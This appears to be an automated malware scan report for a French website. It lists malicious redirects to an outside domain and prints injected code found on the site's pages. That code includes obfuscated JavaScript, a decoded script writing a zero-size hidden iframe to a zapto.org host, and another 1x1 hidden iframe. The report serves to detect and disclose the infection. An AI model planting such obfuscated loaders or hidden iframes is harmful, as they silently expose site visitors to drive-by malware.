Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://francepartenaires.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: francepartenaires.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 04 Sep 2014 22:02:20 GMT Location: http://unibel.info/shop/show.php Server: Apache Content-Length: 311 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://francepartenaires.com/ | 200 OK Content-Length: 3918 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2 Decoded script: document.write(unescape(WSxQJgvuB)) document.write(unescape(WSxQJgvuB)) <iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&hrytewsfd=9889439&yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe> Antivirus reports:
| ||
http://francepartenaires.com/FPM/index.html | 200 OK Content-Length: 3857 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ps="sp"+"li"+"t";asd=function(){d.body++};a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,173,173,173,62,164,171,152,171,165,14 Antivirus reports:
Hidden iFrame found. size: 1x1 src: http://mymusicity.com/common/classes/mtds/go.php?sid=1 <iframe src="http://mymusicity.com/common/classes/mtds/go.php?sid=1" frameborder="0" vspace="0" hspace="0" width="1" height="1" marginwidth="0" marginheight="0" scrolling="no"> | ||
http://francepartenaires.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 22:02:21 GMT Location: http://unibel.info/shop/show.php Server: Apache Content-Length: 287 Content-Type: text/html; charset=iso-8859-1 | clean |
http://unibel.info/shop/show.php | 500 Can't connect to unibel.info:80 (Bad hostname) Content-Length: 154 Content-Type: text/plain | clean |
http://unibel.info/test404page.js | 500 Can't connect to unibel.info:80 (Bad hostname) Content-Length: 154 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=francepartenaires.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://francepartenaires.com/
Result: francepartenaires.com is not infected or malware details are not published yet.
Result: francepartenaires.com is not infected or malware details are not published yet.